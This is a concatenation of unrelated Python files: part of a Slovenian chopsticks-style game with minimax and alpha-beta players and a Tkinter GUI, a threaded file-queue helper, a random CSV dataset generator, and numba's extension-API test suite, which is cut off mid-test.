globina): self.globina = globina self.prekinitev = False self.igra = None # dobimo kasneje self.jaz = None # dobimo kasneje self.poteza = None def prekini(self): """Metoda, ki jo pokliče GUI, če je treba nehati razmišljati, ker je uporabnik zaprl okno ali izbral novo igro.""" self.prekinitev = True def izracunaj_potezo(self, igra): """Izračunaj potezo za trenutno stanje dane igre.""" self.igra = igra self.jaz = self.igra.na_potezi self.prekinitev = False # Sem napišemo potezo, ki jo najdemo. self.poteza = None # Poženemo minimax. (poteza, vrednost) = self.minimax(self.globina, True) self.jaz = None self.igra = None # Če nismo prekinili razmišljanja, lahko nastavimo potezo. if not self.prekinitev: time.sleep(2) self.poteza = poteza # Vrednosti igre ZMAGA = 1000000000 NESKONCNO = ZMAGA + 1 def vrednost_pozicije(self): """Oceni vrednost pozicije po postopku: naši prsti so plus, nasprotnikovi minus.""" stevilo_prstov = 0 for roka in self.igra.position[self.igra.na_potezi]: if roka == 0: stevilo_prstov -= 5 else: stevilo_prstov -= roka for roka in self.igra.position[nasprotnik(self.igra.na_potezi)]: if roka == 0: stevilo_prstov += 5 else: stevilo_prstov += roka # != self.jaz zato, ker je po opravljeni potezi nasprotnik na vrsti. # Z uporabo negacije, 'smo spet mi'. if self.igra.na_potezi != self.jaz: return stevilo_prstov else: return -stevilo_prstov def minimax(self, globina, maksimiziramo): """Glavna metoda algoritma.""" if self.prekinitev: return (None, 0) if self.igra.je_konec(): if self.igra.na_potezi != self.jaz: return (None, Minimax.ZMAGA) else: return (None, -Minimax.ZMAGA) elif self.igra.je_remi(): return (None, 0) else: if globina == 0: return (None, self.vrednost_pozicije()) else: if maksimiziramo: najboljsa_poteza = None vrednost_najboljsa = -Minimax.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.minimax(globina-1, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.razveljavi_potezo() if vrednost > vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) else: # Minimiziramo najboljsa_poteza = None vrednost_najboljsa = Minimax.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.minimax(globina-1, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.opravi_delitev() if vrednost < vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) return (najboljsa_poteza, vrednost_najboljsa) ################################################################################################### # # Razred AlphaBeta # ################################################################################################### class AlphaBeta(): def __init__(self, globina): self.globina = globina self.prekinitev = False self.igra = None self.jaz = None self.poteza = None def prekini(self): """Metoda, ki jo pokliče GUI, če je treba nehati razmišljati, ker je uporabnik zaprl okno ali izbral novo igro.""" self.prekinitev = True def izracunaj_potezo(self, igra): self.igra = igra self.prekinitev = False self.jaz = self.igra.na_potezi # Sem napišemo potezo, ki jo najdemo. self.poteza = None # Poženemo alphabeta. (poteza, vrednost) = self.alphabeta(self.globina, -AlphaBeta.NESKONCNO, AlphaBeta.NESKONCNO, True) self.jaz = None self.igra = None # Če nas niso prekinili, lahko nastavimo potezo. if not self.prekinitev: time.sleep(2) self.poteza = poteza ZMAGA = 1000000000 NESKONCNO = ZMAGA + 1 def vrednost_pozicije(self): """Oceni vrednost pozicije po postopku: naši prsti so plus, nasprotnikovi minus.""" stevilo_prstov = 0 for roka in self.igra.position[self.igra.na_potezi]: if roka == 0: stevilo_prstov -= 5 else: stevilo_prstov -= roka for roka in self.igra.position[nasprotnik(self.igra.na_potezi)]: if roka == 0: stevilo_prstov += 5 else: stevilo_prstov += roka if self.igra.na_potezi != self.jaz: return stevilo_prstov else: return -stevilo_prstov def alphabeta(self, globina, alpha, beta, maksimiziramo): """Glavna metoda algoritma.""" if self.prekinitev == True: return (None, 0) if self.igra.je_konec(): if self.igra.na_potezi != self.jaz: return (None, AlphaBeta.ZMAGA) else: return (None, -AlphaBeta.ZMAGA) elif self.igra.je_remi(): return (None, 0) else: if globina == 0: return (None, self.vrednost_pozicije()) else: if maksimiziramo: najboljsa_poteza = None vrednost_najboljsa = -AlphaBeta.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.alphabeta(globina-1, alpha, beta, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.razveljavi_potezo() if vrednost > vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) if vrednost > alpha: alpha = vrednost if beta <= alpha: break else: najboljsa_poteza = None vrednost_najboljsa = AlphaBeta.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.alphabeta(globina-1, alpha, beta, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.razveljavi_potezo() if vrednost < vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) if vrednost < beta: beta = vrednost if beta <= alpha: break return (najboljsa_poteza, vrednost_najboljsa) def select_gui(master, current_game=None): """Funkcija, s katero lahko izberemo GUI med igro.""" # Ustvarimo popup window window = tk.Toplevel() window.title("Izbira grafičnega vmesnika") msg = tk.Message(window, text="Prosim, izberi grafični vmesnik.\nOpozorilo: Trenutna igra bo prekinjena!") msg.grid(row=0, columnspan=2) button_classic = tk.Button(window, text="Classic", command=lambda:select_gui_now("Classic", master, current_game, window)) button_classic.grid(row=1, column=0) button_new = tk.Button(window, text="New", command=lambda:select_gui_now("New", master, current_game, window)) button_new.grid(row=1, column=1) def select_gui_now(gui_type, master, current_game=None, window=None): """Funkcija, ki nastavi izbran GUI. To funkcijo kličemo tudi ob zagonu igrice.""" # Če je slučajno kakšna igra v teku, prekinemo vse # igralce in uničimo okno main. if current_game != None: current_game.prekini_igralce() current_game.main.destroy() # Če je funkcijo klicala funkcija select_gui, moramo # uničiti popup okno. if window != None: window.destroy() # Nastavimo in vrnemo željen GUI. if gui_type == "Classic": gui = Gui(master) elif gui_type == "New": gui = NewGui(master) return gui if __name__ == "__main__": root = tk.Tk() root.title("Prstki Beta") app = select_gui_now("New", root) root.mainloop() ################################################################################################### # # PRIMER IGRE # ################################################################################################### ''' if __name__ == "__main__": game = Igra(5,2) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(1, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(1, 1) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_delitev() print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.razveljavi_potezo() print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.razveljavi_potezo() print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 1) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) print(game.je_konec()'''
process_file_queue.py
import json import os from queue import Queue import threading class ProcessFileQueue: q = Queue() @staticmethod def start(): print('WORKER STARTED') threading.Thread(target=ProcessFileQueue.worker, daemon=True).start() @staticmethod def worker(): while True: item = ProcessFileQueue.q.get() if item: func = item[0] args = item[1:] func(*args) ProcessFileQueue.q.task_done() def read_json_file(path, grab): if os.path.isfile(path): with open(path, 'r') as f: grab['data'] = json.load(f) else: grab['data'] = {} def read_txt_file(path, grab): if os.path.isfile(path): with open(path, 'r') as f: grab['data'] = f.read() else: grab['data'] = '' def read_txt_file_from_line(path, grab, line_number): grab['data'] = '' if os.path.isfile(path): with open(path, 'r') as f: for i, line in enumerate(f): if i >= line_number: grab['data'] += line def write_json_file(path, content): with open(path, 'w+') as f: json.dump(content, f) def write_txt_file(path, content): with open(path, 'w+') as f: f.write(content) def write_append_line_json_file(path, content): mode = 'a' if os.path.isfile(path) else 'w+' with open(path, mode) as f: if mode == 'a': f.write('\n') f.write(content)
generate_csv_dataset.py
import csv import numpy from threading import Thread from datetime import datetime MAX_VALUE = 1000000 def get_random_array(amount): return numpy.random.randint(0, MAX_VALUE, amount) def save_to_csv(count, file_name: str): array = get_random_array(count//10) with open(file_name + ".csv", "a", newline="") as file: writer = csv.writer(file) writer.writerow(array) if __name__ == "__main__": for key in ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10']: for value in [100, 500, 1000, 5000, 10000, 25000, 50000, 100000, 250000, 500000, 750000, 1000000, 2500000, 5000000]: time1 = datetime.now() thread = [] for i in range(10): thread.append(Thread(target=save_to_csv, args=(value, 'data/{}/'.format(key) + str(value)))) for i in range(10): thread[i].start() for i in range(10): thread[i].join() time2 = datetime.now() print(value, ': ', time2 - time1)
test_extending.py
import math import operator import sys import pickle import multiprocessing import ctypes import warnings from distutils.version import LooseVersion import re import numpy as np from numba import njit, jit, vectorize, guvectorize, objmode from numba.core import types, errors, typing, compiler, cgutils from numba.core.typed_passes import type_inference_stage from numba.core.registry import cpu_target from numba.core.compiler import compile_isolated from numba.tests.support import ( TestCase, captured_stdout, temp_directory, override_config, run_in_new_process_in_cache_dir, ) from numba.core.errors import LoweringError import unittest from numba.extending import ( typeof_impl, type_callable, lower_builtin, lower_cast, overload, overload_attribute, overload_method, models, register_model, box, unbox, NativeValue, intrinsic, _Intrinsic, register_jitable, get_cython_function_address, is_jitted, ) from numba.core.typing.templates import ( ConcreteTemplate, signature, infer, infer_global, AbstractTemplate, ) # Pandas-like API implementation from .pdlike_usecase import Index, Series try: import scipy if LooseVersion(scipy.__version__) < "0.19": sc = None else: import scipy.special.cython_special as sc except ImportError: sc = None # ----------------------------------------------------------------------- # Define a custom type and an implicit cast on it class MyDummy(object): pass class MyDummyType(types.Opaque): def can_convert_to(self, context, toty): if isinstance(toty, types.Number): from numba.core.typeconv import Conversion return Conversion.safe mydummy_type = MyDummyType("mydummy") mydummy = MyDummy() @typeof_impl.register(MyDummy) def typeof_mydummy(val, c): return mydummy_type @lower_cast(MyDummyType, types.Number) def mydummy_to_number(context, builder, fromty, toty, val): """ Implicit conversion from MyDummy to int. """ return context.get_constant(toty, 42) def get_dummy(): return mydummy register_model(MyDummyType)(models.OpaqueModel) @unbox(MyDummyType) def unbox_index(typ, obj, c): return NativeValue(c.context.get_dummy_value()) # ----------------------------------------------------------------------- # Define a second custom type but w/o implicit cast to Number def base_dummy_type_factory(name): class DynType(object): pass class DynTypeType(types.Opaque): pass dyn_type_type = DynTypeType(name) @typeof_impl.register(DynType) def typeof_mydummy(val, c): return dyn_type_type register_model(DynTypeType)(models.OpaqueModel) return DynTypeType, DynType, dyn_type_type MyDummyType2, MyDummy2, mydummy_type_2 = base_dummy_type_factory("mydummy2") @unbox(MyDummyType2) def unbox_index2(typ, obj, c): return NativeValue(c.context.get_dummy_value()) # ----------------------------------------------------------------------- # Define a function's typing and implementation using the classical # two-step API def func1(x=None): raise NotImplementedError def type_func1_(context): def typer(x=None): if x in (None, types.none): # 0-arg or 1-arg with None return types.int32 elif isinstance(x, types.Float): # 1-arg with float return x return typer type_func1 = type_callable(func1)(type_func1_) @lower_builtin(func1) @lower_builtin(func1, types.none) def func1_nullary(context, builder, sig, args): return context.get_constant(sig.return_type, 42) @lower_builtin(func1, types.Float) def func1_unary(context, builder, sig, args): def func1_impl(x): return math.sqrt(2 * x) return context.compile_internal(builder, func1_impl, sig, args) # We can do the same for a known internal operation, here "print_item" # which we extend to support MyDummyType. @infer class PrintDummy(ConcreteTemplate): key = "print_item" cases = [signature(types.none, mydummy_type)] @lower_builtin("print_item", MyDummyType) def print_dummy(context, builder, sig, args): [x] = args pyapi = context.get_python_api(builder) strobj = pyapi.unserialize(pyapi.serialize_object("hello!")) pyapi.print_object(strobj) pyapi.decref(strobj) return context.get_dummy_value() # ----------------------------------------------------------------------- # Define an overloaded function (combined API) def where(cond, x, y): raise NotImplementedError def np_where(cond, x, y): """ Wrap np.where() to allow for keyword arguments """ return np.where(cond, x, y) def call_where(cond, x, y): return where(cond, y=y, x=x) @overload(where) def overload_where_arrays(cond, x, y): """ Implement where() for arrays. """ # Choose implementation based on argument types. if isinstance(cond, types.Array): if x.dtype != y.dtype: raise errors.TypingError("x and y should have the same dtype") # Array where() => return an array of the same shape if all(ty.layout == "C" for ty in (cond, x, y)): def where_impl(cond, x, y): """ Fast implementation for C-contiguous arrays """ shape = cond.shape if x.shape != shape or y.shape != shape: raise ValueError("all inputs should have the same shape") res = np.empty_like(x) cf = cond.flat xf = x.flat yf = y.flat rf = res.flat for i in range(cond.size): rf[i] = xf[i] if cf[i] else yf[i] return res else: def where_impl(cond, x, y): """ Generic implementation for other arrays """ shape = cond.shape if x.shape != shape or y.shape != shape: raise ValueError("all inputs should have the same shape") res = np.empty_like(x) for idx, c in np.ndenumerate(cond): res[idx] = x[idx] if c else y[idx] return res return where_impl # We can define another overload function for the same function, they # will be tried in turn until one succeeds. @overload(where) def overload_where_scalars(cond, x, y): """ Implement where() for scalars. """ if not isinstance(cond, types.Array): if x != y: raise errors.TypingError("x and y should have the same type") def where_impl(cond, x, y): """ Scalar where() => return a 0-dim array """ scal = x if cond else y # Can't use full_like() on Numpy < 1.8 arr = np.empty_like(scal) arr[()] = scal return arr return where_impl # ----------------------------------------------------------------------- # Overload an already defined built-in function, extending it for new types. @overload(len) def overload_len_dummy(arg): if isinstance(arg, MyDummyType): def len_impl(arg): return 13 return len_impl @overload(operator.add) def overload_add_dummy(arg1, arg2): if isinstance(arg1, (MyDummyType, MyDummyType2)) and isinstance( arg2, (MyDummyType, MyDummyType2) ): def dummy_add_impl(arg1, arg2): return 42 return dummy_add_impl @overload(operator.delitem) def overload_dummy_delitem(obj, idx): if isinstance(obj, MyDummyType) and isinstance(idx, types.Integer): def dummy_delitem_impl(obj, idx): print("del", obj, idx) return dummy_delitem_impl @overload(operator.getitem) def overload_dummy_getitem(obj, idx): if isinstance(obj, MyDummyType) and isinstance(idx, types.Integer): def dummy_getitem_impl(obj, idx): return idx + 123 return dummy_getitem_impl @overload(operator.setitem) def overload_dummy_setitem(obj, idx, val): if all( [ isinstance(obj, MyDummyType), isinstance(idx, types.Integer), isinstance(val, types.Integer), ] ): def dummy_setitem_impl(obj, idx, val): print(idx, val) return dummy_setitem_impl def call_add_operator(arg1, arg2): return operator.add(arg1, arg2) def call_add_binop(arg1, arg2): return arg1 + arg2 @overload(operator.iadd) def overload_iadd_dummy(arg1, arg2): if isinstance(arg1, (MyDummyType, MyDummyType2)) and isinstance( arg2, (MyDummyType, MyDummyType2) ): def dummy_iadd_impl(arg1, arg2): return 42 return dummy_iadd_impl def call_iadd_operator(arg1, arg2): return operator.add(arg1, arg2) def call_iadd_binop(arg1, arg2): arg1 += arg2 return arg1 def call_delitem(obj, idx): del obj[idx] def call_getitem(obj, idx): return obj[idx] def call_setitem(obj, idx, val): obj[idx] = val @overload_method(MyDummyType, "length") def overload_method_length(arg): def imp(arg): return len(arg) return imp def cache_overload_method_usecase(x): return x.length() def call_func1_nullary(): return func1() def call_func1_unary(x): return func1(x) def len_usecase(x): return len(x) def print_usecase(x): print(x) def getitem_usecase(x, key): return x[key] def npyufunc_usecase(x): return np.cos(np.sin(x)) def get_data_usecase(x): return x._data def get_index_usecase(x): return x._index def is_monotonic_usecase(x): return x.is_monotonic_increasing def make_series_usecase(data, index): return Series(data, index) def clip_usecase(x, lo, hi): return x.clip(lo, hi) # ----------------------------------------------------------------------- def return_non_boxable(): return np @overload(return_non_boxable) def overload_return_non_boxable(): def imp(): return np return imp def non_boxable_ok_usecase(sz): mod = return_non_boxable() return mod.arange(sz) def non_boxable_bad_usecase(): return return_non_boxable() def mk_func_input(f): pass @infer_global(mk_func_input) class MkFuncTyping(AbstractTemplate): def generic(self, args, kws): assert isinstance(args[0], types.MakeFunctionLiteral) return signature(types.none, *args) def mk_func_test_impl(): mk_func_input(lambda a: a) # ----------------------------------------------------------------------- @overload(np.exp) def overload_np_exp(obj): if isinstance(obj, MyDummyType): def imp(obj): # Returns a constant if a MyDummyType is seen return 0xDEADBEEF return imp class TestLowLevelExtending(TestCase): """ Test the low-level two-tier extension API. """ # We check with both @jit and compile_isolated(), to exercise the # registration logic. def test_func1(self): pyfunc = call_func1_nullary cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(), 42) pyfunc = call_func1_unary cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(None), 42) self.assertPreciseEqual(cfunc(18.0), 6.0) def test_func1_isolated(self): pyfunc = call_func1_nullary cr = compile_isolated(pyfunc, ()) self.assertPreciseEqual(cr.entry_point(), 42) pyfunc = call_func1_unary cr = compile_isolated(pyfunc, (types.float64,)) self.assertPreciseEqual(cr.entry_point(18.0), 6.0) def test_type_callable_keeps_function(self): self.assertIs(type_func1, type_func1_) self.assertIsNotNone(type_func1) def test_cast_mydummy(self): pyfunc = get_dummy cr = compile_isolated(pyfunc, (), types.float64) self.assertPreciseEqual(cr.entry_point(), 42.0) def test_mk_func_literal(self): """make sure make_function is passed to typer class as a literal """ test_ir = compiler.run_frontend(mk_func_test_impl) typingctx = cpu_target.typing_context targetctx = cpu_target.target_context typingctx.refresh() targetctx.refresh() typing_res = type_inference_stage(typingctx, targetctx, test_ir, (), None) self.assertTrue( any( isinstance(a, types.MakeFunctionLiteral) for a in typing_res.typemap.values() ) ) class TestPandasLike(TestCase): """ Test implementing a pandas-like Index object. Also stresses most of the high-level API. """ def test_index_len(self): i = Index(np.arange(3)) cfunc = jit(nopython=True)(len_usecase) self.assertPreciseEqual(cfunc(i), 3) def test_index_getitem(self): i = Index(np.int32([42, 8, -5])) cfunc = jit(nopython=True)(getitem_usecase) self.assertPreciseEqual(cfunc(i, 1), 8) ii = cfunc(i, slice(1, None)) self.assertIsInstance(ii, Index) self.assertEqual(list(ii), [8, -5]) def test_index_ufunc(self): """ Check Numpy ufunc on an Index object. """ i = Index(np.int32([42, 8, -5])) cfunc = jit(nopython=True)(npyufunc_usecase) ii = cfunc(i) self.assertIsInstance(ii, Index) self.assertPreciseEqual(ii._data, np.cos(np.sin(i._data))) def test_index_get_data(self): # The _data attribute is exposed with make_attribute_wrapper() i = Index(np.int32([42, 8, -5])) cfunc = jit(nopython=True)(get_data_usecase) data = cfunc(i) self.assertIs(data, i._data) def test_index_is_monotonic(self): # The is_monotonic_increasing attribute is exposed with # overload_attribute() cfunc = jit(nopython=True)(is_monotonic_usecase) for values, expected in [ ([8, 42, 5], False), ([5, 8, 42], True), ([], True), ]: i = Index(np.int32(values)) got = cfunc(i) self.assertEqual(got, expected) def test_series_len(self): i = Index(np.int32([2, 4, 3])) s = Series(np.float64([1.5, 4.0, 2.5]), i) cfunc = jit(nopython=True)(len_usecase) self.assertPreciseEqual(cfunc(s), 3) def test_series_get_index(self): i = Index(np.int32([2, 4, 3])) s = Series(np.float64([1.5, 4.0, 2.5]), i) cfunc = jit(nopython=True)(get_index_usecase) got = cfunc(s) self.assertIsInstance(got, Index) self.assertIs(got._data, i._data) def test_series_ufunc(self): """ Check Numpy ufunc on an Series object. """ i = Index(np.int32([42, 8, -5])) s = Series(np.int64([1, 2, 3]), i) cfunc = jit(nopython=True)(npyufunc_usecase) ss = cfunc(s) self.assertIsInstance(ss, Series) self.assertIsInstance(ss._index, Index) self.assertIs(ss._index._data, i._data) self.assertPreciseEqual(ss._values, np.cos(np.sin(s._values))) def test_series_constructor(self): i = Index(np.int32([42, 8, -5])) d = np.float64([1.5, 4.0, 2.5]) cfunc = jit(nopython=True)(make_series_usecase) got = cfunc(d, i) self.assertIsInstance(got, Series) self.assertIsInstance(got._index, Index) self.assertIs(got._index._data, i._data) self.assertIs(got._values, d) def test_series_clip(self): i = Index(np.int32([42, 8, -5])) s = Series(np.float64([1.5, 4.0, 2.5]), i) cfunc = jit(nopython=True)(clip_usecase) ss = cfunc(s, 1.6, 3.0) self.assertIsInstance(ss, Series) self.assertIsInstance(ss._index, Index) self.assertIs(ss._index._data, i._data) self.assertPreciseEqual(ss._values, np.float64([1.6, 3.0, 2.5])) class TestHighLevelExtending(TestCase): """ Test the high-level combined API. """ def test_where(self): """ Test implementing a function with @overload. """ pyfunc = call_where cfunc = jit(nopython=True)(pyfunc) def check(*args, **kwargs): expected = np_where(*args, **kwargs) got = cfunc(*args, **kwargs) self.assertPreciseEqual(expected, got) check(x=3, cond=True, y=8) check(True, 3, 8) check( np.bool_([True, False, True]), np.int32([1, 2, 3]), np.int32([4, 5, 5]), ) # The typing error is propagated with self.assertRaises(errors.TypingError) as raises: cfunc(np.bool_([]), np.int32([]), np.int64([])) self.assertIn( "x and y should have the same dtype", str(raises.exception) ) def test_len(self): """ Test re-implementing len() for a custom type with @overload. """ cfunc = jit(nopython=True)(len_usecase) self.assertPreciseEqual(cfunc(MyDummy()), 13) self.assertPreciseEqual(cfunc([4, 5]), 2) def test_print(self): """ Test re-implementing print() for a custom type with @overload. """ cfunc = jit(nopython=True)(print_usecase) with captured_stdout(): cfunc(MyDummy()) self.assertEqual(sys.stdout.getvalue(), "hello!\n") def test_add_operator(self): """ Test re-implementing operator.add() for a custom type with @overload. """ pyfunc = call_add_operator cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_add_binop(self): """ Test re-implementing '+' for a custom type via @overload(operator.add). """ pyfunc = call_add_binop cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_iadd_operator(self): """ Test re-implementing operator.add() for a custom type with @overload. """ pyfunc = call_iadd_operator cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_iadd_binop(self): """ Test re-implementing '+' for a custom type via @overload(operator.add). """ pyfunc = call_iadd_binop cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_delitem(self): pyfunc = call_delitem cfunc = jit(nopython=True)(pyfunc) obj = MyDummy() e = None with captured_stdout() as out: try: cfunc(obj, 321) except Exception as exc: e = exc if e is not None: raise e self.assertEqual(out.getvalue(), "del hello! 321\n") def test_getitem(self): pyfunc = call_getitem cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(MyDummy(), 321), 321 + 123) def test_setitem(self): pyfunc = call_setitem cfunc = jit(nopython=True)(pyfunc) obj = MyDummy() e = None with captured_stdout() as out: try: cfunc(obj, 321, 123) except Exception as exc: e = exc if e is not None: raise e self.assertEqual(out.getvalue(), "321 123\n") def test_no_cpython_wrapper(self): """ Test overloading whose return value cannot be represented in CPython. """ # Test passing Module type from a @overload implementation to ensure # that the *no_cpython_wrapper* flag works ok_cfunc = jit(nopython=True)(non_boxable_ok_usecase) n = 10 got = ok_cfunc(n) expect = non_boxable_ok_usecase(n) np.testing.assert_equal(expect, got) # Verify that the Module type cannot be returned to CPython bad_cfunc = jit(nopython=True)(non_boxable_bad_usecase) with self.assertRaises(TypeError) as raises: bad_cfunc() errmsg = str(raises.exception) expectmsg = "cannot convert native Module" self.assertIn(expectmsg, errmsg) def test_typing_vs_impl_signature_mismatch_handling(self): """ Tests that an overload which has a differing typing and implementing signature raises an exception. """ def gen_ol(impl=None): def myoverload(a, b, c, kw=None): pass @overload(myoverload) def _myoverload_impl(a, b, c, kw=None): return impl @jit(nopython=True) def foo(a, b, c, d): myoverload(a, b, c, kw=d) return foo sentinel = "Typing and implementation arguments differ in" # kwarg value is different def impl1(a, b, c, kw=12): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl1)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument default values", msg) self.assertIn('<Parameter "kw=12">', msg) self.assertIn('<Parameter "kw=None">', msg) # kwarg name is different def impl2(a, b, c, kwarg=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl2)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument names", msg) self.assertIn('<Parameter "kwarg=None">', msg) self.assertIn('<Parameter "kw=None">', msg) # arg name is different def impl3(z, b, c, kw=None): if a > 10: # noqa: F821 return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl3)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "a">', msg) self.assertIn('<Parameter "z">', msg) from .overload_usecases import impl4, impl5 with self.assertRaises(errors.TypingError) as e: gen_ol(impl4)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn("First difference: 'z'", msg) with self.assertRaises(errors.TypingError) as e: gen_ol(impl5)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "a">', msg) self.assertIn('<Parameter "z">', msg) # too many args def impl6(a, b, c, d, e, kw=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl6)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "d">', msg) self.assertIn('<Parameter "e">', msg) # too few args def impl7(a, b, kw=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl7)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "c">', msg) # too many kwargs def impl8(a, b, c, kw=None, extra_kwarg=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl8)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument names", msg) self.assertIn('<Parameter "extra_kwarg=None">', msg) # too few kwargs def impl9(a, b, c): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl9)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument names", msg) self.assertIn('<Parameter "kw=None">', msg) def test_typing_vs_impl_signature_mismatch_handling_var_positional(self): """ Tests that an overload which has a differing typing and implementing signature raises an exception and uses VAR_POSITIONAL (*args) in typing """ def myoverload(a, kw=None): pass from .overload_usecases import var_positional_impl overload(myoverload)(var_positional_impl) @jit(nopython=True) def foo(a, b): return myoverload(a, b, 9, kw=11) with self.assertRaises(errors.TypingError) as e: foo(1, 5) msg = str(e.exception) self.assertIn("VAR_POSITIONAL (e.g. *args) argument kind", msg) self.assertIn("offending argument name is '*star_args_token'", msg) def test_typing_vs_impl_signature_mismatch_handling_var_keyword(self): """ Tests that an overload which uses **kwargs (VAR_KEYWORD) """ def gen_ol(impl, strict=True): def myoverload(a, kw=None): pass overload(myoverload, strict=strict)(impl) @jit(nopython=True) def foo(a, b): return myoverload(a, kw=11) return foo # **kwargs in typing def ol1(a, **kws): def impl(a, kw=10): return a return impl gen_ol(ol1, False)(1, 2) # no error if strictness not enforced with self.assertRaises(errors.TypingError) as e: gen_ol(ol1)(1, 2) msg = str(e.exception) self.assertIn("use of VAR_KEYWORD (e.g. **kwargs) is unsupported", msg) self.assertIn("offending argument name is '**kws'", msg) # **kwargs in implementation def ol2(a, kw=0): def impl(a, **kws): return a return impl with self.assertRaises(errors.TypingError) as e: gen_ol(ol2)(1, 2) msg = str(e.exception) self.assertIn("use of VAR_KEYWORD (e.g. **kwargs) is unsupported", msg) self.assertIn("offending argument name is '**kws'", msg) def test_overload_method_kwargs(self): # Issue #3489 @overload_method(types.Array, "foo") def fooimpl(arr, a_kwarg=10): def impl(arr, a_kwarg=10): return a_kwarg return impl @njit def bar(A): return A.foo(), A.foo(20), A.foo(a_kwarg=30) Z = np.arange(5) self.assertEqual(bar(Z), (10, 20, 30)) def test_overload_method_literal_unpack(self): # Issue #3683 @overload_method(types.Array, "litfoo") def litfoo(arr, val): # Must be an integer if isinstance(val, types.Integer): # Must not be literal if not isinstance(val, types.Literal): def impl(arr, val): return val return impl @njit def bar(A): return A.litfoo(0xCAFE) A = np.zeros(1) bar(A) self.assertEqual(bar(A), 0xCAFE) def test_overload_ufunc(self): # Issue #4133. # Use an extended type (MyDummyType) to use with a customized # ufunc 